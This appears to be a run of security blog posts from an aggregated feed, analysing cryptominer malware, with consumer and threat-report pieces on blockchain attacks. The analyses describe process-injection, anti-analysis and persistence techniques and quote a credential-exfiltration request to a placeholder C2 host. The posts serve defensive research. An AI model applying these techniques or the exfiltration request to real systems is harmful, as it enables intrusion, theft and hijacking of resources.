The DLL then spawns itself (dropper) in SUSPENDED_MODE and injects the decrypted PE using process hollowing.

Analysis of Injected Code (Second Stage Payload)

The second stage payload is a highly obfuscated executable. It consists of a routine that decrypts a chunk of code, executes it, and re-encrypts it.

At the entry point, the executable contains code that checks the OS major version, which it extracts from the Process Environment Block (PEB). If the OS version value is less than 6 (prior to Windows Vista), the executable terminates itself. It also contains code that checks whether the executable is in debugged mode, which it extracts from offset 0x2 of the PEB. If the BeingDebugged flag is set, the executable terminates itself.

The malware also implements an Anti-VM check by opening the registry key HKLM\SYSTEM\ControlSet001\Services\Disk\Enum with value 0.

It checks whether the registry value data contains any of the strings: vmware, virtual, qemu, or xen.  Each of these strings is indictative of virtual machines

After running the anti-analysis and environment check, the malware starts executing the core code to perform the malicious activity.

The malware uses the PROPagate injection method to inject and execute the code in a targeted process. The PROPagate method is similar to the SetWindowLong injection technique. In this method, the malware uses the SetPropA function to modify the callback for UxSubclassInfo and cause the remote process to execute the malicious code.

This code injection technique only works for a process with lesser or equal integrity level. The malware first checks whether the integrity of the current running process is medium integrity level (2000, SECURITY_MANDATORY_MEDIUM_RID). Figure 12 shows the code snippet.

Figure 12: Checking integrity level of current process

If the process is higher than medium integrity level, then the malware proceeds further. If the process is lower than medium integrity level, the malware respawns itself with medium integrity.

The malware creates a file mapping object and writes the dropper file path to it and the same mapping object is accessed by injected code, to read the dropper file path and delete the dropper file. The name of the mapping object is derived from the volume serial number of the system drive and a XOR operation with the hardcoded value (Figure 13).

File Mapping Object Name = “Volume Serial Number” + “Volume Serial Number” XOR 0x7E766791

Figure 13: Creating file mapping object name

The malware then decrypts the third stage payload using XOR and decompresses it with RTLDecompressBuffer. The third stage payload is also a PE executable, but the author has modified the header of the file to avoid it being detected as a PE file in memory scanning. After modifying several header fields at the start of decrypted data, we can get the proper executable header (Figure 14).

Figure 14: Injected executable without header (left), and with header (right)

After decrypting the payload, the malware targets the shell process, explorer.exe, for malicious code injection. It uses GetShellWindow and GetWindowThreadProcessId APIs to get the shell window’s thread ID (Figure 15).

Figure 15: Getting shell window thread ID

The malware injects and maps the decrypted PE in a remote process (explorer.exe). It also injects shellcode that is configured as a callback function in SetPropA.

After injecting the payload into the target process, it uses EnumChild and EnumProps functions to enumerate all entries in the property list of the shell window and compares it with UxSubclassInfo

After finding the UxSubclassInfo property of the shell window, it saves the handle info and uses it to set the callback function through SetPropA.

SetPropA has three arguments, the third of which is data. The callback procedure address is stored at the offset 0x14 from the beginning of data. Malware modifies the callback address with the injected shellcode address (Figure 16).

Figure 16: Modifying callback function

The malware then sends a specific message to the window to execute the callback procedure corresponding to the UxSubclassInfo property, which leads to the execution of the shellcode.

The shellcode contains code to execute the address of the entry point of the injected third stage payload using CreateThread. It then resets the callback for SetPropA, which was modified by malware during PROPagate injection. Figure 17 shows the code snippet of the injected shellcode.

Figure 17: Assembly view of injected shellcode

Analysis of Third Stage Payload

Before executing the malicious code, the malware performs anti-analysis checks to make sure no analysis tool is running in the system. It creates two infinitely running threads that contain code to implement anti-analysis checks.

The first thread enumerates the processes using CreateToolhelp32Snapshot and checks for the process names generally used in analysis. It generates a DWORD hash value from the process name using a custom operation and compares it with the array of hardcoded DWORD values. If the generated value matches any value in the array, it terminates the corresponding process.

The second thread enumerates the windows using EnumWindows. It uses GetClassNameA function to extract the class name associated with the corresponding window. Like the first thread, it generates a DWORD hash value from the class name using a custom operation and compares it with the array of hardcoded DWORD values. If the generated value matches any value in the array, it terminates the process related to the corresponding window.

Other than these two anti-analysis techniques, it also has code to check the internet connectivity by trying to reach the URL: www.msftncsi[.]com/ncsi.txt.

To remain persistent in the system, the malware installs a scheduled task and a shortcut file in %startup% folder. The scheduled task is named “Opera Scheduled Autoupdate {Decimal Value of GetTickCount()}”.

The malware then communicates with the malicious URL to download the final payload, which is a Monero miner. It creates a MD5 hash value using Microsoft CryptoAPIs from the computer name and the volume information and sends the hash to the server in a POST request. Figure 18 shows the network communication.

Figure 18: Network communication

The malware then downloads the final payload, the Monero miner, from the server and installs it in the system.


Although we have been observing a decline in Exploit Kit activity, attackers are not abandoning them altogether. In this blog post, we explored how RIG EK is being used with various exploits to compromise endpoints. We have also shown how the NSIS Loader leverages the lesser known PROPagate process injection technique, possibly in an attempt to evade security products.

FireEye MVX and the FireEye Endpoint Security (HX) platform detect this attack at several stages of the attack chain.


We would like to thank Sudeep Singh and Alex Berry for their contributions to this blog post.

Evasive Monero Miners: Deserting the Sandbox for Profit

Authored by: Alexander Sevtsov
Edited by: Stefano Ortolani


It’s not news that the cryptocurrency industry is on the rise. Mining crypto coins offers to anybody a lucrative way to exchange computation resources for profit: every time a miner guesses the solution of a complex mathematical puzzle, he is awarded with a newly minted crypto coin. While some cryptocurrencies are based on puzzles that are efficiently solved by special-purpose devices (such as Bitcoin on ASICs), others are still mined successfully on commodity hardware.

One, in particular, is the Monero (XMR) cryptocurrency. Besides being efficiently mined on standard CPUs and GPUs, it is also anonymous, or fungible to use the precise Monero term. This means that while it is easy to trace transactions between several Bitcoin wallets, a complex system relying on ring signatures ensures that Monero transactions are difficult if not impossible to trace, effectively hiding the origin of a transaction. Because of this, it should come as no surprise that the Monero cryptocurrency is also used for nefarious purposes, often mined by rogue javascripts or binaries downloaded onto and running on an unsuspecting user’s system.

Recent statistics show that 5% of all Monero coins are mined by malware. While the security industry is responding to this cryptojacking phenomenon by introducing new improved detection techniques, developers of these binaries began to replicate the modus operandi of ransomware samples: they started embedding anti-analysis techniques to evade detection as long as possible. In this blog article, we highlight some of our findings when analyzing a variant of the XMRig miner, and share insights about some evasion tricks used to bypass dynamic analysis systems.


The sample (sha1: d86c1606094bc9362410a1076e29ac68ae98f972) is an obfuscated .Net application that uses a simple crypter to load an embedded executable at runtime using the Assembly.Load method. The following XOR key is used for its decryption:

50 F5 96 DF F0 61 77 42 39 43 FE 30 81 95 6F AF

Execution is later transferred via the EntryPoint.Invoke method to its entry point, after which another binary resource is decrypted. Figure 1 shows the encryption (AES-256) and the key derivation (PBKDF2) algorithms used to decrypt the binary.

Figure 1. AES decryption routine of the embedded file; note the PBKDF2 key

Figure 1. AES decryption routine of the embedded file; note the PBKDF2 key derivation.

The decrypted data consists of yet another executable. We can see it in Figure 2 surrounded by some strings already giving away some of the functionalities included (in particular, note the CheckSandbox and CheckVM strings, most likely indicating routines used to detect whether the sample is run inside an analysis environment).

Figure 2. Decrypted binary blob with an embedded executable file.

Figure 2. Decrypted binary blob with an embedded executable file.

As the reader can imagine, we are always interested in discovering novel evasion techniques. With piqued curiosity, we decided to dive into the code a bit further.


After peeling off all encryption layers, we finally reached the unpacked payload (see Figure 3). As expected, we found quite a number of anti-analysis techniques.

Figure 3. The unpacked payload

Figure 3. The unpacked payload (sha1: 43f84e789710b06b2ab49b47577caf9d22fd45f8) as found in VT.

The most classic trick (shown in Figure 4) merely checked for known anti-analysis processes. For example, Process Explorer, Process Monitor, etc., are all tools used to better understand which processes are running, how they are spawned, and how much CPU resources are consumed by each executing thread. This is a pretty standard technique to hide from such monitoring tools, and it has been used by other crypto miners as well. As we will see, others were a bit more exotic.

Figure 4. Detecting known process monitoring tools

Figure 4. Detecting known process monitoring tools via GetWindowTextW.

Evasion Technique – Lack of User Input

This technique specifically targets dynamic analysis systems. It tries to detect whether it is executing on a real host by measuring the amount of input received by the operating system. Admittedly, this is not that rare, and we indeed covered it before in a previous article describing some evasion techniques as used by ransomware.

Figure 5. Detecting sandbox by checking the last user input

Figure 5. Detecting sandbox by checking the last user input via GetLastInputInfo.

Figure 5 shows the logic in more details: the code measures the time interval between two subsequent inputs. Anything longer than one minute is considered an indicator that the binary is running inside a sandbox. Note that besides being prone to false positives, this technique can easily be circumvented simulating random user interactions.

Evasion Technique – Multicast IcmpSendEcho

The second anti-analysis technique that we investigated delays the execution via the IcmpCreateFile and IcmpSendEcho APIs. As it is further detailed in Figure 6, they are used to ping a reserved multicast address ( with a timeout of 30 seconds. Ideally, as no answer is meant to be returned (interestingly enough we have knowledge of some devices erroneously replying to those ICMP packets), the IcmpSendEcho API has the side effect of pausing the executing thread for 30 seconds.

Figure 6. Delaying the execution via IcmpSendEcho API.

Figure 6. Delaying the execution via IcmpSendEcho API.

It’s worth noticing that a similar trick has been previously used by some infected CCleaner samples. In that case, the malicious shellcode was even going a step further by checking if the timeout parameter was being patched in an attempt to accelerate execution (and thus counter the anti-analysis technique).


Any dynamic analysis system wishing to cope with advanced evasive malware must be able to unpack layers of encryption and counter basic anti-analysis techniques. In Figure 7 we can see all the behaviors extracted when fully executing the original sample: the final payload is recognized as a variant of the XMRig Monero CPU Miner, and its network traffic correctly picked up and marked as suspicious.

Figure 7. Lastline analysis of the XMRig CPU miner.

Figure 7. Lastline analysis of the XMRig CPU miner.

Nevertheless it is quite worrying that anti-analysis techniques are becoming this mainstream. So much so that they started to turn into a standard feature of potentially unwanted applications (PUA) as well, including crypto-miners. Hopefully, it is just an isolated case, and not the first of a long series of techniques borrowed from the ransomware world.

Appendix – IOCs

Attached below the reader can find all the hashes related to this analysis, including the mutex identifying this specific strain, and the XMR wallet.

Sha1 (sample): d86c1606094bc9362410a1076e29ac68ae98f972
Sha1 (payload): 43f84e789710b06b2ab49b47577caf9d22fd45f8
Mutex: htTwkXKgtSjskOUmArFBjXWwLccQgxGT
Wallet: 49ptuU9Ktvr6rBkdmrsxdwiSR5WpViAkCXSzcAYWNmXcSZRv37GjwMBNzR7sZE3qBDTnwF9LZNKA8Er2JBiGcKjS6sPaYxY

The post Evasive Monero Miners: Deserting the Sandbox for Profit appeared first on Lastline.

Blockchain 101: What Consumers Need to Know About the Technology

From Bitcoin’s boom, to high stakes hacks – cryptocurrency, and how to secure it, has been the talk of the town. However, what most don’t realize is that a there is a sophisticated technology involved in each cryptocurrency transaction designed to secure digital currency: blockchain technology. Now, many of you may be asking – what exactly is blockchain? Let’s take a look at how this technology actually works and what the security implications may be for consumers.

What is blockchain?

According to the recent McAfee Blockchain Threat Report, “a blockchain is a series of records or transactions, collected together in a block that defines a portion of a ledger. The ledger is distributed among peers, who use it as a trusted authority in which records are valid. Each block in the ledger is linked to its next block, creating a chain—hence the name.” With blockchain, anyone can look at the latest blocks and their “parent” blocks to determine the state of an address. It also assists with multiple issues that can occur when making digital transactions, such as double spending and currency reproduction.

Remaining cautious with blockchain

Blockchain is essentially the secret weapon behind cryptocurrency’s popularity, as it has been positioned as the technology that will help address digital currency’s security issues. While it has great potential, there are some possible risks that could hinder its growth. For instance, the many cryptocurrency hacks we’ve seen recently have proven blockchain is not exactly foolproof. The mechanism involved in blockchain has some vulnerability in itself – which is a friendly reminder that we still need to be cautious in how we view this technology as it relates to security. Remember that blockchain is created by people, who can make mistakes.

Therefore, it’s important we all remain cautious when it comes to treating this technology like the end all be all. So, if you’re considering using blockchain technology to secure your cryptocurrency, be sure to follow these tips:

  • Don’t put all your eggs in one basket. Diversity is king when it comes to cryptocurrency. Since blockchain isn’t a sure-fire way for securing cryptocurrency transactions, make sure you do your research on the various “coins” out there. Select a nice variety of currency types so that if one cryptocurrency is attacked, you’ll still have a few other types to rely on.
  • Always have a plan B. Make sure you have a paper equivalent of records so that all your transactions are not bound by something that is prone to human error. That way, if for some reason something does go wrong with blockchain, you still have your important transactions documented elsewhere.
  • Do your homework. With blockchain and any new and emerging technology really, make sure you always remain a bit skeptical. Do your homework before you embrace the technology – research your options and make sure there’s been no security issues. 

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Blockchain 101: What Consumers Need to Know About the Technology appeared first on McAfee Blogs.

Malicious Actors Generated $175 Million in Monero Via Cryptocurrency Mining, Report Reveals

Crypto-thieves have earned a total of $175 million in Monero via malicious cryptocurrency mining techniques, according to a recent study. These illicit profits represent 5 percent of all Monero in circulation today.

This surge is largely due to cybercriminals’ preference for the digital currency and the rapid proliferation of crypto-mining malware, the study found. However, since they didn’t include JavaScript or web-based mining activities in their research, the report’s authors noted that the true figure is likely much higher.

Monero: Cybercriminals’ Favorite Digital Currency

For the report, Palo Alto Networks used a threat analysis service to determine which digital currencies malicious actors prefer to mine for and how lucrative this activity is for crypto-miners. Of the 629,126 malware samples included in the research, 531,663 (approximately 85 percent) delivered software designed to mine for Monero. This figure dwarfed that of bitcoin, which came in second with 53,615 samples.

Monero’s dominance extended to the number of wallets observed in the dataset. In total, the researchers identified 2,341 Monero wallets, which was more than twice the amount of bitcoin wallets at 981. By comparison, Electroneum, Ethereum and Litecoin were barely represented at just 131, 44 and 28 wallets, respectively.

In addition, the researchers identified 3,773 emails used to connect to mining pools and 2,995 mining pool URLs.

Addressing the Cryptocurrency Mining Threat

Josh Grunzweig, senior malware researcher at Palo Alto Networks, noted that it’s difficult to defeat cryptocurrency mining software delivered by malware.

“Many malware authors will limit the CPU utilization, or ensure that mining operations only take place during specific times of the day or when the user is inactive,” Grunzweig explained. “Additionally, the malware itself is delivered via a large number of methods, requiring defenders to have an in-depth approach to security.”

To help organizations protect themselves, Palo Alto provided all Monero wallets and hashes for all the malicious samples it identified in its research.

The post Malicious Actors Generated $175 Million in Monero Via Cryptocurrency Mining, Report Reveals appeared first on Security Intelligence.

Threat Report: Don’t Join Blockchain Revolution Without Ensuring Security

On May 19 researchers discovered a series of vulnerabilities in the blockchain-based EOS platform that can lead to remote control over participating nodes. Just four days prior, a mining pool server for the IOT platform HDAC was compromised, impacting the vast majority of miners. In January the largest-ever theft of cryptocurrencies occurred against the exchange Coincheck, resulting in the loss of US$532 million in NEM coin. Due to its increased popularity and profitability cybercriminals have been targeting all things blockchain. McAfee Advanced Threat Research team analysts have now published the McAfee Blockchain Threat Report to explain current threats against the users and implementers of blockchain technologies.

What is Blockchain?

Even if you have not heard of blockchain, you have likely heard of cryptocurrencies, namely Bitcoin, the most popular implementation. In late 2017 Bitcoin reached a value of $20,000 per coin, prompting a lot of interest in the currency—including from cybercriminals. Cryptocurrencies are built on top of blockchain, which records transactions in a decentralized way and enables a trusted “ledger” between trustless participants. Each block in the ledger is linked to the next block, creating a chain. Hence, the system is called a blockchain. The chain enables anyone to validate all transactions without going to an outside source. From this, decentralized currencies such as Bitcoin are possible.

Proof-of-work blockchain. Source:

Blockchain Attacks

Attackers have adopted many methods targeting consumers and businesses. The primary attack vectors include phishing, malware, implementation vulnerabilities, and technology. In a phishing scheme in January, Iota cryptocurrency lost $4 million to scams that lasted several months. Malware authors often change their focus. In late 2017 to early 2018 some have migrated from deploying ransomware to cryptomining. They have been found using open-source code such as XMRig for system-based mining and the mining service Coinhive.

Source: McAfee Labs

Implementation vulnerabilities are the flaws introduced when new technologies and tools are built on top of blockchain. The recent EOS attack is one example. In mid-July 2017 Iota suffered an attack that essentially enabled attackers to steal from any wallet. Another currency, Verge, was found with numerous vulnerabilities. Attackers exploiting the vulnerabilities were able to generate coins without spending any mining power.

Known attacks against the core blockchain technology are much more difficult to implement, although they are not unheard of. The most widely known attack is the 51% attack, or majority attack, which enables attackers to create their own chains at will. The group 51 Crew targeted small coins, including Krypton, and held them for ransom. Another attack, known as a Sybil attack, can allow an attacker to completely control a targeted victim’s ledger. Attempts have been made for larger scale Sybil attacks such as one in 2016. 

Dictionary Attacks

Blockchain may be a relatively new technology but that does not mean that old attacks cannot work. Mostly due to insecure user behavior, dictionary attacks can leverage some implementations of blockchain. Brain wallets, or wallets based on weak passwords, are insecure, yet people still use them. These wallets are routinely stolen, as was the case with the nearly BTC60 stolen from the following wallet:

This wallet recorded two transactions as recently as March 5, 2018. One incoming and one outgoing transaction occurred within roughly 15 minutes. Source:

Exchanges Under Attack

The biggest players, and targets, in blockchain are cryptocurrency exchanges. Cryptocurrency exchanges can be thought of as banks in which you users create accounts, manage finances, and even trade currencies including traditional ones. One of the most notable incidents is the attack against Mt. Gox between 2011‒2014 that resulted in $450 million of Bitcoin stolen and led to the liquidation and closure of the company. Coincheck, previously mentioned, survived the attack and began reimbursing victims for their losses in March 2018. Not all recent exchanges fared so well. Bitcurex abruptly closed and led to an official investigation into the circumstances; Youbit suffered two attacks, leading the company into bankruptcy.

An advertisement for the shuttered Polish exchange Bitcurex.


Blockchain technologies and its users are heavily targeted by profit-driven cybercriminals. Current attackers are changing their tactics and new groups are entering the space. As more businesses look to blockchain to solve their business problems and consumers increasingly rely on these technologies, we must be diligent in understanding where the threats lie to achieve proper and tailored risk management. New implementations must place security at the forefront. Cybercriminals have already enjoyed successes against the users and implementations of blockchain so we must prepare accordingly.

The post Threat Report: Don’t Join Blockchain Revolution Without Ensuring Security appeared first on McAfee Blogs.

Parasitic Coin Mining Creates Wealth, Destroys Systems

The increasing popularity of cryptocurrencies has inspired some people to pursue coin mining, essentially making money online. (Mining is the processing of transactions in the digital currency system, in which new transactions are recorded in a digital ledger called the blockchain. Miners help to update the ledger to verify and collect new transactions to be added to the blockchain. In return, miners earn Bitcoins, for example.) Mining is resource intensive and legal if it is done with the proper permissions.

McAfee Labs has recently seen a huge increase in a malware variant, commonly known as CoinMiner or CoinMiner-FOZU!, which takes control of a victim’s computer to mine new coins by infecting user executables, injecting Coinhive JavaScript into HTML files, and blocking the domains of security products to stop signature updates.

CoinMiner-FOZU!, which we analyzed, has led all major coin-miner malware in prevalence in 2018. (March figures are incomplete.) Source: McAfee Labs.

The following graphs show statistics and geographic data for recent CoinMiner-FOZU! detections:

W32/CoinMiner employs—without a user’s consent—machine resources to mine coins for virtual currencies. Its parasitic nature makes it rare as well as destructive: The malware does not put a unique marker on each file it infects. Thus subsequent infections by the same malware will reinfect the victim’s files.


After launching, CoinMiner copies itself into two hardcoded locations:

  • %Windows%\360\360Safe\deepscan\ZhuDongFangYu.exe
  • %filesystemroot%:\RECYCLER\S-5-4-62-7581032776-5377505530-562822366-6588\ZhuDongFangYu.exe

These two files are hidden and read only:

The binary executes from the first location and starts the parasitic infection process. The malware prepends itself to user-executable files but, unlike traditional file infectors, it does not allow the original file to run. It targets files with extensions .exe, .com, .scr, and .pif. This malware does not check for multiple infections. If the threat is deleted and later reinfects the system, the same files will again be targeted.

To prevent victims from restoring clean copies of their files, the malware deletes both ISO (disk image) and GHO (Norton Ghost) files:


Once CoinMiner finishes infecting other executable files, it injects a Coinhive script into HTML files. The Coinhive service provides cryptocurrency mining software, which using JavaScript code can be embedded in websites and use the site visitor’s processing power to mine the cryptocurrency:

CoinMiner disables the user account control feature, which notifies the user when applications make changes to the system. Through registry updates, it also disables folder options and registry tools, and deletes safe mode.

From its second location on an infected system—the hidden autorun.inf at the file system root—the malware ensures that it starts after rebooting:

To avoid detection by security products, CoinMiner puts security software domains in the hosts file and redirects them to, the loopback address on the victim’s system. If users have not created a local website, they will see an error page in their browsers. By doing this, the malware ensures that no victim can receive an update from the security vendor.

When the victim runs the script-injected HTML files, the Coinhive script executes, downloading coinhive.min.js (hash: 4d6af0dba75bedf4d8822a776a331b2b1591477c6df18698ad5b8628e0880382) from This script takes over 100% of the CPU for mining using the function setThrottle(0). The mining stops when the victim closes the infected HTML file:

The simple hosts-file injection, hiding in the recycle bin, and maximizing CPU usage suggest that this malware has been written by a novice author. McAfee advises all users to keep their antimalware products up to date.

McAfee Detections

  • W32/CoinMiner
  • CoinMiner-FOZU![Partial hash]
  • TXT/CoinMiner.m
  • HTML/CoinMiner.m
  • JS/Miner.c

Hashes (SHA-256)

  • 80568db643de5f429e9ad5e2005529bc01c4d7da06751e343c05fa51f537560d
  • bb987f37666b6e8ebf43e443fc4bacd5f0ab795194f20c01fcd10cb582da1c57
  • 4d6af0dba75bedf4d8822a776a331b2b1591477c6df18698ad5b8628e0880382

The post Parasitic Coin Mining Creates Wealth, Destroys Systems appeared first on McAfee Blogs.

CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques Used Post-Exploitation and Pre-Mining


FireEye researchers recently observed threat actors abusing CVE-2017-10271 to deliver various cryptocurrency miners.

CVE-2017-10271 is a known input validation vulnerability that exists in the WebLogic Server Security Service (WLS Security) in Oracle WebLogic Server versions and prior, and attackers can exploit it to remotely execute arbitrary code. Oracle released a Critical Patch Update that reportedly fixes this vulnerability. Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors.

FireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017. Attackers then leveraged this vulnerability to download cryptocurrency miners in victim environments.

We saw evidence of organizations located in various countries – including the United States, Australia, Hong Kong, United Kingdom, India, Malaysia, and Spain, as well as those from nearly every industry vertical – being impacted by this activity. Actors involved in cryptocurrency mining operations mainly exploit opportunistic targets rather than specific organizations. This coupled with the diversity of organizations potentially affected by this activity suggests that the external targeting calculus of these attacks is indiscriminate in nature.

The recent cryptocurrency boom has resulted in a growing number of operations – employing diverse tactics – aimed at stealing cryptocurrencies. The idea that these cryptocurrency mining operations are less risky, along with the potentially nice profits, could lead cyber criminals to begin shifting away from ransomware campaigns.

Tactic #1: Delivering the miner directly to a vulnerable server

Some tactics we've observed involve exploiting CVE-2017-10271, leveraging PowerShell to download the miner directly onto the victim’s system (Figure 1), and executing it using ShellExecute().

Figure 1: Downloading the payload directly

Tactic #2: Utilizing PowerShell scripts to deliver the miner

Other tactics involve the exploit delivering a PowerShell script, instead of downloading the executable directly (Figure 2).

Figure 2: Exploit delivering PowerShell script

This script has the following functionalities:

  • Downloading miners from remote servers

Figure 3: Downloading cryptominers

As shown in Figure 3, the .ps1 script tries to download the payload from the remote server to a vulnerable server.

  • Creating scheduled tasks for persistence

Figure 4: Creation of scheduled task

  • Deleting scheduled tasks of other known cryptominers

Figure 5: Deletion of scheduled tasks related to other miners

In Figure 4, the cryptominer creates a scheduled task with name “Update service for Oracle products1”.  In Figure 5, a different variant deletes this task and other similar tasks after creating its own, “Update service for Oracle productsa”.  

From this, it’s quite clear that different attackers are fighting over the resources available in the system.

  • Killing processes matching certain strings associated with other cryptominers

Figure 6: Terminating processes directly

Figure 7: Terminating processes matching certain strings

Similar to scheduled tasks deletion, certain known mining processes are also terminated (Figure 6 and Figure 7).

  • Connects to mining pools with wallet key

Figure 8: Connection to mining pools

The miner is then executed with different flags to connect to mining pools (Figure 8). Some of the other observed flags are: -a for algorithm, -k for keepalive to prevent timeout, -o for URL of mining server, -u for wallet key, -p for password of mining server, and -t for limiting the number of miner threads.

  • Limiting CPU usage to avoid suspicion

Figure 9: Limiting CPU Usage

To avoid suspicion, some attackers are limiting the CPU usage of the miner (Figure 9).

Tactic #3: Lateral movement across Windows environments using Mimikatz and EternalBlue

Some tactics involve spreading laterally across a victim’s environment using dumped Windows credentials and the EternalBlue vulnerability (CVE-2017-0144).

The malware checks whether its running on a 32-bit or 64-bit system to determine which PowerShell script to grab from the command and control (C2) server. It looks at every network adapter, aggregating all destination IPs of established non-loopback network connections. Every IP address is then tested with extracted credentials and a credential-based execution of PowerShell is attempted that downloads and executes the malware from the C2 server on the target machine. This variant maintains persistence via WMI (Windows Management Instrumentation).

The malware also has the capability to perform a Pass-the-Hash attack with the NTLM information derived from Mimikatz in order to download and execute the malware in remote systems.

Additionally, the malware exfiltrates stolen credentials to the attacker via an HTTP GET request to: 'http://<C2>:8000/api.php?data=<credential data>'.

If the lateral movement with credentials fails, then the malware uses PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine if its vulnerable to EternalBlue, and uses it to spread to that host.

After all network derived IPs have been processed, the malware generates random IPs and uses the same combination of PingCastle and EternalBlue to spread to that host.

Tactic #4: Scenarios observed in Linux OS

We’ve also observed this vulnerability being exploited to deliver shell scripts (Figure 10) that have functionality similar to the PowerShell scripts.

Figure 10: Delivery of shell scripts

The shell script performs the following activities:

  • Attempts to kill already running cryptominers

Figure 11: Terminating processes matching certain strings

  • Downloads and executes cryptominer malware

Figure 12: Downloading CryptoMiner

  • Creates a cron job to maintain persistence

Figure 13: Cron job for persistence

  • Tries to kill other potential miners to hog the CPU usage

Figure 14: Terminating other potential miners

The function shown in Figure 14 is used to find processes that have high CPU usage and terminate them. This terminates other potential miners and maximizes the utilization of resources.


Use of cryptocurrency mining malware is a popular tactic leveraged by financially-motivated cyber criminals to make money from victims. We’ve observed one threat actor mining around 1 XMR/day, demonstrating the potential profitability and reason behind the recent rise in such attacks. Additionally, these operations may be perceived as less risky when compared to ransomware operations, since victims may not even know the activity is occurring beyond the slowdown in system performance.

Notably, cryptocurrency mining malware is being distributed using various tactics, typically in an opportunistic and indiscriminate manner so cyber criminals will maximize their outreach and profits.

FireEye HX, being a behavior-based solution, is not affected by cryptominer tricks. FireEye HX detects these threats at the initial level of the attack cycle, when the attackers attempt to deliver the first stage payload or when the miner tries to connect to mining pools.

At the time of writing, FireEye HX detects this activity with the following indicators:

Detection Name




Indicators of Compromise





















Thanks to Dileep Kumar Jallepalli and Charles Carmakal for their help in the analysis.

Weekly Cyber Risk Roundup: Cryptocurrency Attacks and a Major Cybercriminal Indictment

Cryptocurrency continued to make headlines this past week for a variety of cybercrime-related activities.

2018-02-10_ITT.pngFor starters, researchers discovered a new cryptocurrency miner, dubbed ADB.Miner, that infected nearly 7,000 Android devices such as smartphones, televisions, and tablets over a several-day period. The researchers said the malware uses the ADB debug interface on port 5555 to spread and that it has Mirai code within its scanning module.

In addition, several organizations reported malware infections involving cryptocurrency miners. Four servers at a wastewater facility in Europe were infected with malware designed to mine Monero, and the incident is the first ever documented mining attack to hit an operational technology network of a critical infrastructure operator, security firm Radiflow said. In addition, Decatur County General Hospital recently reported that cryptocurrency mining malware was found on a server related to its electronic medical record system.

Reuters also reported this week on allegations by South Korea that North Korea had hacked into unnamed cryptocurrency exchanges and stolen billions of won. Investors of the Bee Token ICO were also duped after scammers sent out phishing messages to the token’s mailing list claiming that a surprise partnership with Microsoft had been formed and that those who contributed to the ICO in the next six hours would receive a 100% bonus.

All of the recent cryptocurrency-related cybercrime headlines have led some experts to speculate that the use of mining software on unsuspecting users’ machines, or cryptojacking, may eventually surpass ransomware as the primary money maker for cybercriminals.


Other trending cybercrime events from the week include:

  • W-2 data compromised: The City of Pittsburg said that some employees had their W-2 information compromised due to a phishing attack. The University of Northern Colorado said that 12 employees had their information compromised due to unauthorized access to their profiles on the university’s online portal, Ursa, which led to the theft of W-2 information. Washington school districts are warning that an ongoing phishing campaign is targeting human resources and payroll staff in an attempt to compromise W-2 information.
  • U.S. defense secrets targeted: The Russian hacking group known as Fancy Bear successfully gained access to the email accounts of contract workers related to sensitive U.S. defense technology; however, it is uncertain what may have been stolen. The Associated Press reported that the group targeted at least 87 people working on militarized drones, missiles, rockets, stealth fighter jets, cloud-computing platforms, or other sensitive activities, and as many as 40 percent of those targeted ultimately clicked on the hackers’ phishing links.
  • Financial information stolen: Advance-Online is notifying customers that their personal and financial information stored on the company’s online platform may have been subject to unauthorized access from April 29, 2017 to January 12, 2018. Citizens Financials Group is notifying customers that their financial information may have been compromised due to the discovery of a skimming device found at a Citizens Bank ATM in Connecticut. Ameriprise Financial is notifying customers that one of its former employees has been calling its service center and impersonating them by using their name, address, and account numbers.
  • Other notable events:  Swisscom said that the “misappropriation of a sales partner’s access rights” led to a 2017 data breach that affected approximately 800,000 customers. A cloud repository belonging to the Paris-based brand marketing company Octoly was erroneously configured for public access and exposed the personal information of more than 12,000 Instagram, Twitter, and YouTube personalities. Ron’s Pharmacy in Oregon is notifying customers that their personal information may have been compromised due to unauthorized access to an employee’s email account. Partners Healthcare said that a May 2017 data breach may have exposed the personal information of up to 2,600 patients. Harvey County in Kansas said that a cyber-attack disrupted county services and led to a portion of the network being disabled. Smith Dental in Tennessee said that a ransomware infection may have compromised the personal information of 1,500 patients. Fresenius Medical Care North America has agreed to a $3.5 million settlement to settle potential HIPAA violations stemming from five separate breaches that occurred in 2012.

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of those “newly seen” targets, meaning they either appeared in SurfWatch Labs’ data for the first time or else reappeared after being absent for several weeks, are shown in the chart below.


Cyber Risk Trends From the Past Week

2018-02-10_RiskScoresA federal indictment charging 36 individuals for their role in a cybercriminal enterprise known as the Infraud Organization, which was responsible for more than $530 million in losses, was unsealed this past week. Acting Assistant Attorney General Cronan said the case is “one of the largest cyberfraud enterprise prosecutions ever undertaken by the Department of Justice.”

The indictment alleges that the group engaged in the large-scale acquisition, sale, and dissemination of stolen identities, compromised debit and credit cards, personally identifiable information, financial and banking information, computer malware, and other contraband dating back to October 2010. Thirteen of those charged were taken into custody in countries around the world.

As the Justice Department press release noted:

Under the slogan, “In Fraud We Trust,” the organization directed traffic and potential purchasers to the automated vending sites of its members, which served as online conduits to traffic in stolen means of identification, stolen financial and banking information, malware, and other illicit goods.  It also provided an escrow service to facilitate illicit digital currency transactions among its members and employed screening protocols that purported to ensure only high quality vendors of stolen cards, personally identifiable information, and other contraband were permitted to advertise to members.

ABC News reported that investigators believe the group’s nearly 11,000 members targeted more than 4.3 million credit cards, debit cards, and bank accounts worldwide. Over its seven-year history, the group inflicted $2.2 billion in intended losses and more than $530 million in actual losses against a wide range of financial institutions, merchants, and individuals.


Swisscoin [SIC] cryptocurrency spam

Swisscoin is a fairly low-volume self-styled cryptocurrency that has been the target of a Necurs-based spam run starting on Saturday 13th January, and increasing in volume to huge levels on Monday. From:    Florine Fray [Fray.419@redacted.tld] Date:    15 January 2018 at 10:51 Subject:    Could this digital currency actually make you a millionaire? Every once in a while, an opportunity comes